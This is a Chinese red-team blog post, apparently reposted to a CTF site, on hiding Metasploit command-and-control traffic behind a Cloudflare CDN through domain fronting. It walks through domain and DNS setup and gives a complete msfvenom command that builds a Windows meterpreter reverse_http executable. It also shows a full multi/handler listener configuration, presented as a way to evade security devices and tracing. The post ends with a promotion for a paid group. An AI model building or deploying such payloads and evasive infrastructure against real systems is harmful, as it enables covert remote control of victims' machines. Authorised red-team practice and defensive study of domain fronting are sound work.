红队技巧 | Metasploit 红队基础设施建设

渗透技巧 3年前 (2021) admin
958 0 0

0x01 前言

停更了一小段时间,去备战月考了!这几天看了一篇关于Metasploit文章,发现好多红队基础设施建设都是关于CobaltStrike 其实Metasploit也可以域前置

0x02 概括

  • 攻击流量通过CDN节点将流量转发到真实的C2服务器
  • CDN节点ip通过识别请求的Host头进行流量转
  • 可以有效的躲避一些安全设备,也有这一定的反溯源功能,因为流量都去了CDN上

0x03 准备

域名申请地址:https://www.godaddy.com/

红队技巧 | Metasploit 红队基础设施建设

我自己是用这个平台注册的,但是是需要付费的

红队技巧 | Metasploit 红队基础设施建设

免费CDN

申请地址:https://dash.cloudflare.com/

登陆CDN,添加站点为刚刚申请的域名

红队技巧 | Metasploit 红队基础设施建设

添加A记录,指向VPS的IP地址

红队技巧 | Metasploit 红队基础设施建设
红队技巧 | Metasploit 红队基础设施建设
红队技巧 | Metasploit 红队基础设施建设

配置好后,返回cdn平台 为了实时受到我们的命令的响应:我们需要修改缓存规则:

红队技巧 | Metasploit 红队基础设施建设
红队技巧 | Metasploit 红队基础设施建设

0x04 域前置

msfvenom -p windows/meterpreter/reverse_http LHOST=服务器IP LPORT=80 HttpHostHeader=域名 -f exe -o ~/payload.exe

LHOST: VPS上架一个Metasploit然后输入VPS的IP地址

LPORT: http 协议的 payload,访问域名的 80 端口

HttpHostHeader: 使用我们进行域前置攻击的域名,能够把流量转回到我们自己的服务器

Metasploit监听器

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf5 exploit(multi/handler) > set LHOST VPS IP
lhost => VPS IP
msf5 exploit(multi/handler) > set LPORT 80
lport => 80
msf5 exploit(multi/handler) > set HttpHostHeader 域名
HttpHostHeader => 域名
msf5 exploit(multi/handler) > set OverrideRequestHost true
OverrideRequestHost => true
msf5 exploit(multi/handler) > set ReverseListenerBindAddress 127.0.0.1
ReverseListenerBindAddress => 127.0.0.1
msf5 exploit(multi/handler) > run

0x05 效果

红队技巧 | Metasploit 红队基础设施建设

从现在开始,星球定价125元!日后只有慢慢涨没有跌价!现在入股不亏,持续输出原创文章,还是小有干货的!红队技巧 | Metasploit 红队基础设施建设

原文始发于微信公众号(不懂安全的校长):红队技巧 | Metasploit 红队基础设施建设

版权声明:admin 发表于 2021年10月29日 下午12:15。
转载请注明:红队技巧 | Metasploit 红队基础设施建设 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...